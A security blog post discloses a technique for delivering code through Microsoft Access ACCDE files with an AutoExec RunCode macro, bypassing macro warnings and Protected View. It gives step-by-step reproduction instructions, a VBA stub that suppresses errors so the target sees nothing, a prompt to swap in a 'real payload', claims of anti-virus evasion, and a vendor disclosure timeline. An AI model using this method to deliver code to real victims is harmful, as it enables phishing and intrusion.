MAccess – Bypassing Office macro warnings

A new attack technique for penetration testers, using Microsoft Office and ACCDE files

Posted by Kaiosec Group. January 04, 2018

Daniel Levi, the founder of Kaiosec Security Consulting, discovered a new attack technique for penetration testers that uses Microsoft Office and ACCDE files.

One of the most popular ways for attackers to launch their attacks is a malicious Microsoft Office file, such as a Word document or a PowerPoint presentation.

Delivering a malicious macro is not always easy, however, because of the security features Microsoft has built into Office.

For example, a downloaded file opens in Protected View:

[Screenshot: Microsoft Office Protected View]

Another example is that any file containing a macro prompts a security warning before the macro is allowed to execute:

[Screenshot: "Macros have been disabled" security warning]

Microsoft Access macros

Microsoft Access is a DBMS with a GUI, and it is part of Microsoft Office:

[Screenshot: Microsoft Access]

It looks like all the other Office products, so Daniel decided to investigate it and found a way to deliver malware with no macro alert at all, and with none of the anti-virus engines in a NoDistribute scan detecting the file:

[Screenshot: NoDistribute scan]

We did not use any kind of obfuscation; the method was unknown, and therefore no AV engine flagged the file.

Daniel discovered that Microsoft Access lets a user create a macro with the "RunCode" action, which executes an arbitrary VBA function. Exporting the database as an execute-only ACCDE file bypasses the macro security warnings, and the function runs automatically when the file is opened. Note that the target must have Microsoft Access installed, which is not included in every Office edition.

Reverse Shell PoC:

Reproduction steps:

Open Microsoft Access and press ALT+F11 to open the Visual Basic editor, then choose Tools > Macros.
Enter your macro name and click Create:

[Screenshot: Create Macro]

Make sure your Access database is selected under "Macros In:".

Now comes the fun part: create a function with your payload:

[Screenshot: Payload Function]
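The payload module, given here as an added example rather than the author's own code (the original PoC screenshot used a reverse-shell command where the stand-in below launches Notepad). RunCode can only call a Function, not a Sub, so the payload must be declared as a Function; the name kaiosec() is the one the post uses later. The marker-file path and the Notepad launch are illustration choices and not part of the original:

```vba
' Standard module in the Access database (added example, not the original PoC).
' RunCode calls a Function, so the entry point must be declared as one; the
' return value is ignored by the macro but makes the result easy to check.
Option Explicit

Public Function kaiosec() As Boolean
    On Error GoTo Fail

    ' Proof of execution: record who ran the code, where and when.
    ' Path is an illustration choice; the original PoC launched a reverse shell here.
    Dim marker As String
    marker = Environ$("TEMP") & "\maccess_poc.txt"

    Dim fnum As Integer
    fnum = FreeFile
    Open marker For Output As #fnum
    Print #fnum, "Executed by " & Environ$("USERNAME") & "\" & _
                 Environ$("COMPUTERNAME") & " at " & Now
    Close #fnum

    ' Visible side effect for the demo: open the marker in Notepad.
    ' Replace this single line with the real payload command.
    Shell "notepad.exe """ & marker & """", vbNormalFocus

    kaiosec = True
    Exit Function

Fail:
    ' Swallow errors so the AutoExec macro never surfaces a runtime dialog to the target.
    kaiosec = False
End Function
```

Before the final File > Save As > Make ACCDE step, run Debug > Compile in the Visual Basic editor: an ACCDE contains only compiled code, so Make ACCDE fails if the project does not compile cleanly.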

Press CTRL+S to save and return to Access.

Click on Create > Macro:

[Screenshot: Create Macro]

Search for RunCode:

[Screenshot: RunCode]

In the Function Name field, type the name of the function you wrote in Visual Basic; in this case it is kaiosec().

Press CTRL+S to save the macro and name it "AutoExec". Access runs a macro with this name automatically when the database opens, which ensures the payload executes without user interaction.

Last step

We now have a macro that executes our malicious function, but the "Protected View" and "Enable Content" warning messages are still in the way.

We found that these warnings can be bypassed by saving the Access file as execute-only:
File > Save As > Make ACCDE.

[Screenshot: RunCode]

This ensures that no macro warning is shown when the file is opened.

Timeline:

  • Nov 12 – Reported to Microsoft.
  • Nov 14 – Microsoft answered that they are investigating the report.
  • Nov 14 – Microsoft sent questions about the vulnerability.
  • Nov 15 – Answers and a PoC file sent to Microsoft.
  • Nov 16 – Microsoft passed the information on to Engineering.
  • Dec 6 – I asked for updates.
  • Dec 9 – Microsoft responded that the report has been going back and forth actively between Engineering and the product team.
  • Dec 29 – Microsoft considers this a "by-design" issue and therefore will not modify this behavior via a security update.

Since the behavior is by design, no patch is expected; mitigation is left to the receiving side, for example filtering .accde and .accdb attachments at the mail gateway and not deploying Access where it is not needed.

For any question, please do not hesitate to contact, Daniel | daniel@kaiosec.com

Update:

After posting the article above, someone sent us the following link:

http://www.rvrsh3ll.net/blog/phishing/phishing-for-access/

The article at that link (by Steve Borosh) describes the same technique. It was posted on Dec 2; we reported the issue to Microsoft on Nov 12, before that article was published, and were waiting for Microsoft to close the case, which happened on Dec 29. Steve found it independently in the meantime. Good job ;)